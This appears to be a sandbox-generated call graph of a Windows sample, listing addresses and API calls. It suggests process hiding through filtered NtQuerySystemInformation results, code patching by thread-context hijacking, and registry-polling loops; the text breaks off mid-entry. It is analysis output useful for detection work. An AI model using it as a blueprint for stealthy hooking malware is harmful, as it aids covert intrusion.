_invalid_parameter_noinfo 7795->7796 7797 202c0aecde2 RtlCaptureContext RtlLookupFunctionEntry 7796->7797 7798 202c0aece2e RtlVirtualUnwind 7797->7798 7799 202c0aece64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7797->7799 7798->7799 7800 202c0aeceb6 _invalid_parameter_noinfo 7799->7800 7803 202c0ae8070 7800->7803 7804 202c0ae8079 7803->7804 7805 202c0ae8084 GetCurrentProcess TerminateProcess 7804->7805 7806 202c0ae8848 IsProcessorFeaturePresent 7804->7806 7807 202c0ae8860 7806->7807 7812 202c0ae891c RtlCaptureContext 7807->7812 7813 202c0ae8936 RtlLookupFunctionEntry 7812->7813 7814 202c0ae894c RtlVirtualUnwind 7813->7814 7815 202c0ae8873 7813->7815 7814->7813 7814->7815 7816 202c0ae8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7815->7816 7818 202c0af0001 7817->7818 7819 202c0aec48f 7817->7819 7818->7819 7825 202c0af0a40 7818->7825 7821 202c0af0054 7819->7821 7822 202c0af006d 7821->7822 7824 202c0aec49f 7821->7824 7822->7824 7835 202c0aee8c4 7822->7835 7824->7753 7826 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7825->7826 7827 202c0af0a4f 7826->7827 7833 202c0af0a95 7827->7833 7834 202c0aec558 EnterCriticalSection 7827->7834 7833->7819 7836 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7835->7836 7837 202c0aee8cd 7836->7837 8950 202c0aef370 VirtualProtect 8529 202c0aeb7ea 8530 202c0aec2f4 14 API calls 8529->8530 8531 202c0aeb7ef 8530->8531 8532 202c0aeb85f 8531->8532 8533 202c0aeb815 GetModuleHandleW 8531->8533 8546 202c0aeb6f8 8532->8546 8533->8532 8537 202c0aeb822 8533->8537 8537->8532 8541 202c0aeb904 GetModuleHandleExW 8537->8541 8542 202c0aeb938 GetProcAddress 8541->8542 8543 202c0aeb94a 8541->8543 8542->8543 8544 202c0aeb95b FreeLibrary 8543->8544 8545 202c0aeb962 8543->8545 8544->8545 8545->8532 8558 202c0aec558 EnterCriticalSection 8546->8558 8559 202c0ae27e8 8561 202c0ae2867 _invalid_parameter_noinfo 8559->8561 8560 202c0ae2998 8561->8560 8562 202c0ae28c9 GetFileType 8561->8562 8563 202c0ae28ed 8562->8563 8564 202c0ae28d7 StrCpyW 8562->8564 8575 202c0ae1ad4 GetFinalPathNameByHandleW 8563->8575 8565 202c0ae28fc 8564->8565 8569 202c0ae299d 8565->8569 8573 202c0ae2906 8565->8573 8567 202c0ae3f88 StrCmpNIW 8567->8569 8568 202c0ae3f88 StrCmpNIW 8568->8573 8569->8560 8569->8567 8570 202c0ae3708 4 API calls 8569->8570 8571 202c0ae1dd4 2 API calls 8569->8571 8570->8569 8571->8569 8573->8560 8573->8568 8580 202c0ae3708 StrCmpIW 8573->8580 8584 202c0ae1dd4 8573->8584 8576 202c0ae1afe StrCmpNIW 8575->8576 8577 202c0ae1b3d 8575->8577 8576->8577 8578 202c0ae1b18 lstrlenW 8576->8578 8577->8565 8578->8577 8579 202c0ae1b2a StrCpyW 8578->8579 8579->8577 8581 202c0ae3751 PathCombineW 8580->8581 8582 202c0ae373a StrCpyW StrCatW 8580->8582 8583 202c0ae375a 8581->8583 8582->8583 8583->8573 8585 202c0ae1df4 8584->8585 8586 202c0ae1deb 8584->8586 8585->8573 8587 202c0ae1530 2 API calls 8586->8587 8587->8585 8588 202c0aef3e4 8589 202c0aef41d 8588->8589 8590 202c0aef3ee 8588->8590 8590->8589 8591 202c0aef403 FreeLibrary 8590->8591 8591->8590 8592 202c0af33e4 8593 202c0af33fb 8592->8593 8594 202c0af33f5 CloseHandle 8592->8594 8594->8593 8595 202c0ae63e3 8596 202c0ae63f0 8595->8596 8597 202c0ae63fc GetThreadContext 8596->8597 8602 202c0ae655a 8596->8602 8598 202c0ae6422 8597->8598 8597->8602 8598->8602 8604 202c0ae6449 8598->8604 8599 202c0ae6581 VirtualProtect FlushInstructionCache 8599->8602 8600 202c0ae663e 8601 202c0ae665e 8600->8601 8613 202c0ae4b20 8600->8613 8617 202c0ae5530 GetCurrentProcess 8601->8617 8602->8599 8602->8600 8605 202c0ae64cd 8604->8605 8607 202c0ae64a6 SetThreadContext 8604->8607 8607->8605 8608 202c0ae6677 ResumeThread 8610 202c0ae6663 8608->8610 8609 202c0ae66b7 8611 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8609->8611 8610->8608 8610->8609 8612 202c0ae66ff 8611->8612 8615 202c0ae4b3c 8613->8615 8614 202c0ae4b9f 8614->8601 8615->8614 8616 202c0ae4b52 VirtualFree 8615->8616 8616->8615 8618 202c0ae554c 8617->8618 8619 202c0ae5562 VirtualProtect FlushInstructionCache 8618->8619 8620 202c0ae5593 8618->8620 8619->8618 8620->8610 7492 202c0ae2300 NtQuerySystemInformation 7493 202c0ae233c 7492->7493 7494 202c0ae2447 7493->7494 7502 202c0ae2355 7493->7502 7505 202c0ae2412 7493->7505 7495 202c0ae244c 7494->7495 7496 202c0ae24bb 7494->7496 7512 202c0ae35c8 GetProcessHeap HeapAlloc 7495->7512 7498 202c0ae24c0 7496->7498 7496->7505 7500 202c0ae35c8 11 API calls 7498->7500 7499 202c0ae238d StrCmpNIW 7499->7502 7503 202c0ae2464 7500->7503 7501 202c0ae23b4 7501->7502 7506 202c0ae1d30 7501->7506 7502->7499 7502->7501 7502->7505 7503->7505 7507 202c0ae1d57 GetProcessHeap HeapAlloc 7506->7507 7508 202c0ae1db4 7506->7508 7507->7508 7509 202c0ae1d92 7507->7509 7508->7501 7518 202c0ae1cfc 7509->7518 7517 202c0ae361b 7512->7517 7513 202c0ae36d9 GetProcessHeap HeapFree 7513->7503 7514 202c0ae36d4 7514->7513 7515 202c0ae3666 StrCmpNIW 7515->7517 7516 202c0ae1d30 6 API calls 7516->7517 7517->7513 7517->7514 7517->7515 7517->7516 7519 202c0ae1d1c GetProcessHeap HeapFree 7518->7519 7520 202c0ae1d13 7518->7520 7519->7508 7522 202c0ae1530 7520->7522 7523 202c0ae154a 7522->7523 7526 202c0ae1580 7522->7526 7524 202c0ae1561 StrCmpIW 7523->7524 7525 202c0ae1569 StrCmpW 7523->7525 7523->7526 7524->7523 7525->7523 7526->7519 7838 202c0ae2c80 TlsGetValue TlsGetValue TlsGetValue 7839 202c0ae2cd9 7838->7839 7845 202c0ae2d51 7838->7845 7841 202c0ae2ce1 7839->7841 7839->7845 7840 202c0ae2d4c 7841->7840 7842 202c0ae2e06 TlsSetValue TlsSetValue TlsSetValue 7841->7842 7846 202c0ae3f88 7841->7846 7842->7840 7844 202c0ae3f88 StrCmpNIW 7844->7845 7845->7840 7845->7842 7845->7844 7847 202c0ae3faa 7846->7847 7848 202c0ae3f95 StrCmpNIW 7846->7848 7847->7841 7848->7847 8960 202c0aec180 8963 202c0aebf38 8960->8963 8970 202c0aebf00 8963->8970 8971 202c0aebf10 8970->8971 8972 202c0aebf15 8970->8972 8973 202c0aebebc 13 API calls 8971->8973 8974 202c0aebf1c 8972->8974 8973->8972 8975 202c0aebf31 8974->8975 8976 202c0aebf2c 8974->8976 8978 202c0aebebc 8975->8978 8977 202c0aebebc 13 API calls 8976->8977 8977->8975 8979 202c0aebec1 8978->8979 8980 202c0aebef2 8978->8980 8981 202c0aebeea 8979->8981 8983 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8979->8983 8982 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8981->8982 8982->8980 8983->8979 9217 202c0aeb500 9222 202c0aec558 EnterCriticalSection 9217->9222 7849 202c0af387c 7850 202c0af38b4 __GSHandlerCheckCommon 7849->7850 7851 202c0af38e0 7850->7851 7853 202c0ae9a24 7850->7853 7860 202c0ae9324 7853->7860 7855 202c0ae9a4e 7856 202c0ae9324 _CallSETranslator 9 API calls 7855->7856 7857 202c0ae9a5b 7856->7857 7858 202c0ae9324 _CallSETranslator 9 API calls 7857->7858 7859 202c0ae9a64 7858->7859 7859->7851 7863 202c0ae9340 7860->7863 7862 202c0ae932d 7862->7855 7864 202c0ae935f GetLastError 7863->7864 7865 202c0ae9358 7863->7865 7875 202c0ae9c8c 7864->7875 7865->7862 7879 202c0ae9aac 7875->7879 7880 202c0ae9b96 TlsGetValue 7879->7880 7886 202c0ae9af0 __vcrt_FlsAlloc 7879->7886 7881 202c0ae9b1e LoadLibraryExW 7883 202c0ae9b3f GetLastError 7881->7883 7884 202c0ae9bbd 7881->7884 7882 202c0ae9bdd GetProcAddress 7882->7880 7883->7886 7884->7882 7885 202c0ae9bd4 FreeLibrary 7884->7885 7885->7882 7886->7880 7886->7881 7886->7882 7887 202c0ae9b61 LoadLibraryExW 7886->7887 7887->7884 7887->7886 8621 202c0aecbfc 8626 202c0aef3a0 8621->8626 8623 202c0aecc05 8624 202c0aecb10 __std_exception_copy 13 API calls 8623->8624 8625 202c0aecc22 __vcrt_uninitialize_ptd 8623->8625 8624->8625 8627 202c0aef3b1 8626->8627 8628 202c0aef3b5 8626->8628 8627->8623 8628->8627 8629 202c0aeef88 9 API calls 8628->8629 8629->8627 8630 202c0ae41f9 8631 202c0ae4146 _invalid_parameter_noinfo 8630->8631 8632 202c0ae4196 VirtualQuery 8631->8632 8633 202c0ae41b0 8631->8633 8634 202c0ae41ca VirtualAlloc 8631->8634 8632->8631 8632->8633 8634->8633 8635 202c0ae41fb GetLastError 8634->8635 8635->8631 8636 202c0ae5ff9 8637 202c0ae6000 VirtualProtect 8636->8637 8638 202c0ae6029 GetLastError 8637->8638 8639 202c0ae5f10 8637->8639 8638->8639 8984 202c0ae5974 8985 202c0ae597a 8984->8985 8996 202c0ae7fa0 8985->8996 8989 202c0ae59de 8991 202c0ae5a77 _invalid_parameter_noinfo 8991->8989 8993 202c0ae5bfd 8991->8993 9009 202c0ae7b80 8991->9009 8992 202c0ae5cfb 8993->8992 8994 202c0ae5d77 VirtualProtect 8993->8994 8994->8989 8995 202c0ae5da3 GetLastError 8994->8995 8995->8989 8997 202c0ae7fab 8996->8997 8998 202c0ae59bd 8997->8998 8999 202c0aeb470 _invalid_parameter_noinfo 2 API calls 8997->8999 9000 202c0ae7fca 8997->9000 8998->8989 9005 202c0ae4400 8998->9005 8999->8997 9003 202c0ae7fd5 9000->9003 9015 202c0ae87b8 9000->9015 9019 202c0ae87d8 9003->9019 9006 202c0ae441d 9005->9006 9008 202c0ae448c _invalid_parameter_noinfo 9006->9008 9023 202c0ae4670 9006->9023 9008->8991 9010 202c0ae7bc7 9009->9010 9048 202c0ae7950 9010->9048 9013 202c0ae8070 _invalid_parameter_noinfo 8 API calls 9014 202c0ae7bf1 9013->9014 9014->8991 9016 202c0ae87c6 std::bad_alloc::bad_alloc 9015->9016 9017 202c0ae9178 Concurrency::cancel_current_task 2 API calls 9016->9017 9018 202c0ae87d7 9017->9018 9020 202c0ae87e6 std::bad_alloc::bad_alloc 9019->9020 9021 202c0ae9178 Concurrency::cancel_current_task 2 API calls 9020->9021 9022 202c0ae7fdb 9021->9022 9024 202c0ae46b7 9023->9024 9025 202c0ae4694 9023->9025 9026 202c0ae46ed 9024->9026 9043 202c0ae4250 9024->9043 9025->9024 9037 202c0ae4120 9025->9037 9027 202c0ae471d 9026->9027 9030 202c0ae4250 2 API calls 9026->9030 9031 202c0ae4120 3 API calls 9027->9031 9034 202c0ae4753 9027->9034 9030->9027 9031->9034 9032 202c0ae4120 3 API calls 9035 202c0ae476f 9032->9035 9033 202c0ae4250 2 API calls 9036 202c0ae478b 9033->9036 9034->9032 9034->9035 9035->9033 9035->9036 9036->9008 9042 202c0ae4141 _invalid_parameter_noinfo 9037->9042 9038 202c0ae4196 VirtualQuery 9041 202c0ae41b0 9038->9041 9038->9042 9039 202c0ae41ca VirtualAlloc 9040 202c0ae41fb GetLastError 9039->9040 9039->9041 9040->9042 9041->9024 9042->9038 9042->9039 9042->9041 9046 202c0ae4268 _invalid_parameter_noinfo 9043->9046 9044 202c0ae42bd VirtualQuery 9045 202c0ae42d7 9044->9045 9044->9046 9045->9026 9046->9044 9046->9045 9047 202c0ae4322 GetLastError 9046->9047 9047->9045 9047->9046 9049 202c0ae796b 9048->9049 9050 202c0ae7981 SetLastError 9049->9050 9051 202c0ae798f 9049->9051 9050->9051 9051->9013 9223 202c0af46f5 9224 202c0ae9324 _CallSETranslator 9 API calls 9223->9224 9225 202c0af470d 9224->9225 9226 202c0ae9324 _CallSETranslator 9 API calls 9225->9226 9227 202c0af4728 9226->9227 9228 202c0ae9324 _CallSETranslator 9 API calls 9227->9228 9229 202c0af473c 9228->9229 9230 202c0ae9324 _CallSETranslator 9 API calls 9229->9230 9231 202c0af477e 9230->9231 7888 202c0ae8672 7891 202c0ae90c0 7888->7891 7890 202c0ae869d 7892 202c0ae9116 7891->7892 7893 202c0ae90e1 7891->7893 7892->7890 7893->7892 7895 202c0aec328 7893->7895 7896 202c0aec33f 7895->7896 7897 202c0aec335 7895->7897 7898 202c0aed1f4 __std_exception_copy 13 API calls 7896->7898 7897->7896 7899 202c0aec35a 7897->7899 7903 202c0aec346 7898->7903 7901 202c0aec352 7899->7901 7902 202c0aed1f4 __std_exception_copy 13 API calls 7899->7902 7900 202c0aed04c _invalid_parameter_noinfo 38 API calls 7900->7901 7901->7892 7902->7903 7903->7900 9232 202c0ae86d0 9233 202c0ae90c0 __std_exception_copy 38 API calls 9232->9233 9234 202c0ae86f9 9233->9234 8640 202c0af19d0 8643 202c0aee864 8640->8643 8644 202c0aee871 8643->8644 8648 202c0aee8b6 8643->8648 8649 202c0aecacc 8644->8649 8646 202c0aee8a0 8654 202c0aee53c 8646->8654 8650 202c0aecae8 FlsGetValue 8649->8650 8652 202c0aecae4 8649->8652 8650->8652 8651 202c0aecafe 8651->8646 8652->8651 8653 202c0aec940 _invalid_parameter_noinfo 13 API calls 8652->8653 8653->8651 8677 202c0aee7ac 8654->8677 8659 202c0aee58e 8659->8648 8660 202c0aec5d0 14 API calls 8661 202c0aee59f 8660->8661 8662 202c0aee5a7 8661->8662 8664 202c0aee5b6 8661->8664 8663 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8662->8663 8663->8659 8664->8664 8696 202c0aee8e0 8664->8696 8667 202c0aee6b2 8668 202c0aed1f4 __std_exception_copy 13 API calls 8667->8668 8669 202c0aee6b7 8668->8669 8672 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8669->8672 8670 202c0aee70d 8671 202c0aee774 8670->8671 8707 202c0aee05c 8670->8707 8675 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8671->8675 8672->8659 8673 202c0aee6cc 8673->8670 8676 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8673->8676 8675->8659 8676->8670 8678 202c0aee7cf 8677->8678 8683 202c0aee7d9 8678->8683 8722 202c0aec558 EnterCriticalSection 8678->8722 8684 202c0aee571 8683->8684 8686 202c0aecacc 14 API calls 8683->8686 8689 202c0aee22c 8684->8689 8687 202c0aee8a0 8686->8687 8688 202c0aee53c 56 API calls 8687->8688 8688->8684 8690 202c0aedd78 14 API calls 8689->8690 8691 202c0aee240 8690->8691 8692 202c0aee25e 8691->8692 8693 202c0aee24c GetOEMCP 8691->8693 8694 202c0aee273 8692->8694 8695 202c0aee263 GetACP 8692->8695 8693->8694 8694->8659 8694->8660 8695->8694 8697 202c0aee22c 16 API calls 8696->8697 8698 202c0aee91b 8697->8698 8699 202c0aeea71 8698->8699 8700 202c0aee958 IsValidCodePage 8698->8700 8706 202c0aee972 _invalid_parameter_noinfo 8698->8706 8701 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8699->8701 8700->8699 8702 202c0aee969 8700->8702 8703 202c0aee6a9 8701->8703 8704 202c0aee998 GetCPInfo 8702->8704 8702->8706 8703->8667 8703->8673 8704->8699 8704->8706 8723 202c0aee344 8706->8723 8796 202c0aec558 EnterCriticalSection 8707->8796 8724 202c0aee38f GetCPInfo 8723->8724 8725 202c0aee485 8723->8725 8724->8725 8731 202c0aee3a2 8724->8731 8726 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8725->8726 8728 202c0aee524 8726->8728 8728->8699 8734 202c0af1474 8731->8734 8733 202c0af1938 33 API calls 8733->8725 8735 202c0aedd78 14 API calls 8734->8735 8736 202c0af14b6 8735->8736 8737 202c0aeec58 MultiByteToWideChar 8736->8737 8739 202c0af14ec 8737->8739 8738 202c0af14f3 8740 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8738->8740 8739->8738 8741 202c0aec5d0 14 API calls 8739->8741 8743 202c0af15b0 8739->8743 8745 202c0af151c _invalid_parameter_noinfo 8739->8745 8742 202c0aee419 8740->8742 8741->8745 8749 202c0af1938 8742->8749 8743->8738 8744 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8743->8744 8744->8738 8745->8743 8746 202c0aeec58 MultiByteToWideChar 8745->8746 8747 202c0af1592 8746->8747 8747->8743 8748 202c0af1596 GetStringTypeW 8747->8748 8748->8743 8750 202c0aedd78 14 API calls 8749->8750 8751 202c0af195d 8750->8751 8754 202c0af1604 8751->8754 8755 202c0af1645 8754->8755 8756 202c0aeec58 MultiByteToWideChar 8755->8756 8759 202c0af168f 8756->8759 8757 202c0af190d 8758 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8757->8758 8760 202c0aee44c 8758->8760 8759->8757 8761 202c0aec5d0 14 API calls 8759->8761 8762 202c0af17c5 8759->8762 8764 202c0af16c7 8759->8764 8760->8733 8761->8764 8762->8757 8763 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8762->8763 8763->8757 8764->8762 8765 202c0aeec58 MultiByteToWideChar 8764->8765 8766 202c0af173a 8765->8766 8766->8762 8785 202c0aef218 8766->8785 8768 202c0af176d 8768->8762 8769 202c0af17d6 8768->8769 8770 202c0af1785 8768->8770 8771 202c0aec5d0 14 API calls 8769->8771 8773 202c0af18a8 8769->8773 8774 202c0af17f4 8769->8774 8770->8762 8772 202c0aef218 10 API calls 8770->8772 8771->8774 8772->8762 8773->8762 8775 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8773->8775 8774->8762 8776 202c0aef218 10 API calls 8774->8776 8775->8762 8777 202c0af1874 8776->8777 8777->8773 8778 202c0af18aa 8777->8778 8779 202c0af1894 8777->8779 8780 202c0aeece8 WideCharToMultiByte 8778->8780 8781 202c0aeece8 WideCharToMultiByte 8779->8781 8782 202c0af18a2 8780->8782 8781->8782 8782->8773 8783 202c0af18c2 8782->8783 8783->8762 8784 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8783->8784 8784->8762 8786 202c0aef244 8785->8786 8790 202c0aef267 8785->8790 8788 202c0aeef88 9 API calls 8786->8788 8791 202c0aef26f 8786->8791 8788->8790 8789 202c0aef2cd LCMapStringW 8789->8791 8790->8791 8792 202c0aef30c 8790->8792 8791->8768 8793 202c0aef34a 8792->8793 8794 202c0aef328 8792->8794 8793->8789 8794->8793 8795 202c0aeef88 9 API calls 8794->8795 8795->8793 9052 202c0af494f 9053 202c0af495e 9052->9053 9054 202c0af4968 9052->9054 9056 202c0aec5ac LeaveCriticalSection 9053->9056 7904 202c0ae824c 7906 202c0ae8270 __scrt_release_startup_lock 7904->7906 7905 202c0aeb581 7906->7905 7907 202c0aecb10 __std_exception_copy 13 API calls 7906->7907 7908 202c0aeb5aa 7907->7908 8797 202c0ae5fcc 8798 202c0ae5fd3 8797->8798 8799 202c0ae6000 VirtualProtect 8798->8799 8801 202c0ae5f10 8798->8801 8800 202c0ae6029 GetLastError 8799->8800 8799->8801 8800->8801 9057 202c0aead48 9058 202c0ae9324 _CallSETranslator 9 API calls 9057->9058 9059 202c0aead7d 9058->9059 9060 202c0ae9324 _CallSETranslator 9 API calls 9059->9060 9061 202c0aead8b __except_validate_context_record 9060->9061 9062 202c0ae9324 _CallSETranslator 9 API calls 9061->9062 9063 202c0aeadcf 9062->9063 9064 202c0ae9324 _CallSETranslator 9 API calls 9063->9064 9065 202c0aeadd8 9064->9065 9066 202c0ae9324 _CallSETranslator 9 API calls 9065->9066 9067 202c0aeade1 9066->9067 9080 202c0ae993c 9067->9080 9070 202c0ae9324 _CallSETranslator 9 API calls 9071 202c0aeae11 __CxxCallCatchBlock 9070->9071 9072 202c0ae9978 __CxxCallCatchBlock 9 API calls 9071->9072 9076 202c0aeaec2 9072->9076 9073 202c0aeaeeb __CxxCallCatchBlock 9074 202c0ae9324 _CallSETranslator 9 API calls 9073->9074 9075 202c0aeaefe 9074->9075 9077 202c0ae9324 _CallSETranslator 9 API calls 9075->9077 9076->9073 9078 202c0ae8ff8 __CxxCallCatchBlock 9 API calls 9076->9078 9079 202c0aeaf07 9077->9079 9078->9073 9081 202c0ae9324 _CallSETranslator 9 API calls 9080->9081 9082 202c0ae994d 9081->9082 9083 202c0ae9958 9082->9083 9084 202c0ae9324 _CallSETranslator 9 API calls 9082->9084 9085 202c0ae9324 _CallSETranslator 9 API calls 9083->9085 9084->9083 9086 202c0ae9969 9085->9086 9086->9070 9086->9071 7909 202c0af4848 7912 202c0ae904c 7909->7912 7913 202c0ae9076 7912->7913 7914 202c0ae9064 7912->7914 7916 202c0ae9324 _CallSETranslator 9 API calls 7913->7916 7914->7913 7915 202c0ae906c 7914->7915 7917 202c0ae9324 _CallSETranslator 9 API calls 7915->7917 7918 202c0ae9074 7915->7918 7919 202c0ae907b 7916->7919 7921 202c0ae909b 7917->7921 7919->7918 7920 202c0ae9324 _CallSETranslator 9 API calls 7919->7920 7920->7918 7922 202c0ae9324 _CallSETranslator 9 API calls 7921->7922 7923 202c0ae90a8 7922->7923 7928 202c0aec2f4 7923->7928 7929 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7928->7929 7930 202c0aec2fd 7929->7930 7608 202c0ae1bc4 7615 202c0ae1724 GetProcessHeap HeapAlloc 7608->7615 7610 202c0ae1bd3 7611 202c0ae1bda SleepEx 7610->7611 7614 202c0ae159c StrCmpIW StrCmpW 7610->7614 7666 202c0ae19b0 7610->7666 7612 202c0ae1724 50 API calls 7611->7612 7612->7610 7614->7610 7683 202c0ae1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7615->7683 7617 202c0ae174c 7684 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7617->7684 7619 202c0ae1754 7685 202c0ae1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7619->7685 7621 202c0ae175d 7686 202c0ae1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7621->7686 7623 202c0ae1766 7687 202c0ae1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7623->7687 7625 202c0ae176f 7688 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7625->7688 7627 202c0ae1778 7689 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7627->7689 7629 202c0ae1781 7690 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7629->7690 7631 202c0ae178a RegOpenKeyExW 7632 202c0ae17bc RegOpenKeyExW 7631->7632 7633 202c0ae19a2 7631->7633 7634 202c0ae17fb RegOpenKeyExW 7632->7634 7635 202c0ae17e5 7632->7635 7633->7610 7637 202c0ae181f 7634->7637 7638 202c0ae1836 RegOpenKeyExW 7634->7638 7697 202c0ae12b8 RegQueryInfoKeyW 7635->7697 7691 202c0ae104c RegQueryInfoKeyW 7637->7691 7641 202c0ae1871 RegOpenKeyExW 7638->7641 7642 202c0ae185a 7638->7642 7645 202c0ae18ac RegOpenKeyExW 7641->7645 7646 202c0ae1895 7641->7646 7644 202c0ae12b8 16 API calls 7642->7644 7650 202c0ae1867 RegCloseKey 7644->7650 7648 202c0ae18d0 7645->7648 7649 202c0ae18e7 RegOpenKeyExW 7645->7649 7647 202c0ae12b8 16 API calls 7646->7647 7651 202c0ae18a2 RegCloseKey 7647->7651 7652 202c0ae12b8 16 API calls 7648->7652 7653 202c0ae190b 7649->7653 7654 202c0ae1922 RegOpenKeyExW 7649->7654 7650->7641 7651->7645 7655 202c0ae18dd RegCloseKey 7652->7655 7656 202c0ae104c 6 API calls 7653->7656 7657 202c0ae195d RegOpenKeyExW 7654->7657 7658 202c0ae1946 7654->7658 7655->7649 7659 202c0ae1918 RegCloseKey 7656->7659 7661 202c0ae1981 7657->7661 7662 202c0ae1998 RegCloseKey 7657->7662 7660 202c0ae104c 6 API calls 7658->7660 7659->7654 7664 202c0ae1953 RegCloseKey 7660->7664 7663 202c0ae104c 6 API calls 7661->7663 7662->7633 7665 202c0ae198e RegCloseKey 7663->7665 7664->7657 7665->7662 7706 202c0ae14a0 7666->7706 7683->7617 7684->7619 7685->7621 7686->7623 7687->7625 7688->7627 7689->7629 7690->7631 7692 202c0ae10bf 7691->7692 7693 202c0ae11b5 RegCloseKey 7691->7693 7692->7693 7694 202c0ae10cf RegEnumValueW 7692->7694 7693->7638 7695 202c0ae1125 7694->7695 7695->7693 7695->7694 7696 202c0ae114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7695->7696 7696->7695 7698 202c0ae1486 RegCloseKey 7697->7698 7699 202c0ae1323 GetProcessHeap HeapAlloc 7697->7699 7698->7634 7700 202c0ae134e RegEnumValueW 7699->7700 7701 202c0ae1472 GetProcessHeap HeapFree 7699->7701 7703 202c0ae13a1 7700->7703 7701->7698 7702 202c0ae1530 2 API calls 7702->7703 7703->7700 7703->7701 7703->7702 7704 202c0ae13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7703->7704 7705 202c0ae141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7703->7705 7704->7705 7705->7703 7707 202c0ae14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7706->7707 7708 202c0ae14c2 GetProcessHeap HeapFree 7706->7708 7708->7707 7708->7708 7931 202c0aeae42 7932 202c0ae9324 _CallSETranslator 9 API calls 7931->7932 7934 202c0aeae4f __CxxCallCatchBlock 7932->7934 7933 202c0aeae93 RaiseException 7935 202c0aeaeba 7933->7935 7934->7933 7944 202c0ae9978 7935->7944 7937 202c0ae9324 _CallSETranslator 9 API calls 7939 202c0aeaefe 7937->7939 7940 202c0ae9324 _CallSETranslator 9 API calls 7939->7940 7942 202c0aeaf07 7940->7942 7943 202c0aeaeeb __CxxCallCatchBlock 7943->7937 7945 202c0ae9324 _CallSETranslator 9 API calls 7944->7945 7946 202c0ae998a 7945->7946 7947 202c0ae99c5 7946->7947 7948 202c0ae9324 _CallSETranslator 9 API calls 7946->7948 7949 202c0ae9995 7948->7949 7949->7947 7950 202c0ae9324 _CallSETranslator 9 API calls 7949->7950 7951 202c0ae99b6 7950->7951 7951->7943 7952 202c0ae8ff8 7951->7952 7953 202c0ae9324 _CallSETranslator 9 API calls 7952->7953 7954 202c0ae9006 7953->7954 7954->7943 8802 202c0af47c2 8803 202c0ae9978 __CxxCallCatchBlock 9 API calls 8802->8803 8806 202c0af47d5 8803->8806 8804 202c0af4814 __CxxCallCatchBlock 8805 202c0ae9324 _CallSETranslator 9 API calls 8804->8805 8807 202c0af4828 8805->8807 8806->8804 8809 202c0ae8ff8 __CxxCallCatchBlock 9 API calls 8806->8809 8808 202c0ae9324 _CallSETranslator 9 API calls 8807->8808 8810 202c0af4838 8808->8810 8809->8804 9087 202c0ae7f60 9088 202c0ae7f81 9087->9088 9089 202c0ae7f7c 9087->9089 9091 202c0ae8090 9089->9091 9092 202c0ae8127 9091->9092 9093 202c0ae80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9091->9093 9092->9088 9093->9092 9094 202c0af3960 9104 202c0ae8ca0 9094->9104 9096 202c0af3988 9098 202c0ae9324 _CallSETranslator 9 API calls 9099 202c0af3998 9098->9099 9100 202c0ae9324 _CallSETranslator 9 API calls 9099->9100 9101 202c0af39a1 9100->9101 9102 202c0aec2f4 14 API calls 9101->9102 9103 202c0af39aa 9102->9103 9105 202c0ae8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9104->9105 9106 202c0ae8dd1 9105->9106 9107 202c0ae8d94 RtlUnwindEx 9105->9107 9106->9096 9106->9098 9107->9105 9235 202c0af06e0 9236 202c0af06e9 9235->9236 9240 202c0af06f9 9235->9240 9237 202c0aed1f4 __std_exception_copy 13 API calls 9236->9237 9238 202c0af06ee 9237->9238 9239 202c0aed04c _invalid_parameter_noinfo 38 API calls 9238->9239 9239->9240 7955 202c0af465f 7956 202c0af4677 7955->7956 7962 202c0af46e2 7955->7962 7957 202c0ae9324 _CallSETranslator 9 API calls 7956->7957 7956->7962 7958 202c0af46c4 7957->7958 7959 202c0ae9324 _CallSETranslator 9 API calls 7958->7959 7960 202c0af46d9 7959->7960 7961 202c0aec2f4 14 API calls 7960->7961 7961->7962 7963 202c0af485e 7964 202c0ae9324 _CallSETranslator 9 API calls 7963->7964 7965 202c0af486c 7964->7965 7966 202c0af4877 7965->7966 7967 202c0ae9324 _CallSETranslator 9 API calls 7965->7967 7967->7966 8811 202c0ae25dc 8813 202c0ae265a _invalid_parameter_noinfo 8811->8813 8812 202c0ae2777 8813->8812 8814 202c0ae26bf GetFileType 8813->8814 8815 202c0ae26e1 8814->8815 8816 202c0ae26cd StrCpyW 8814->8816 8817 202c0ae1ad4 4 API calls 8815->8817 8820 202c0ae26ee 8816->8820 8817->8820 8818 202c0ae3f88 StrCmpNIW 8818->8820 8819 202c0ae3708 4 API calls 8819->8820 8820->8812 8820->8818 8820->8819 8821 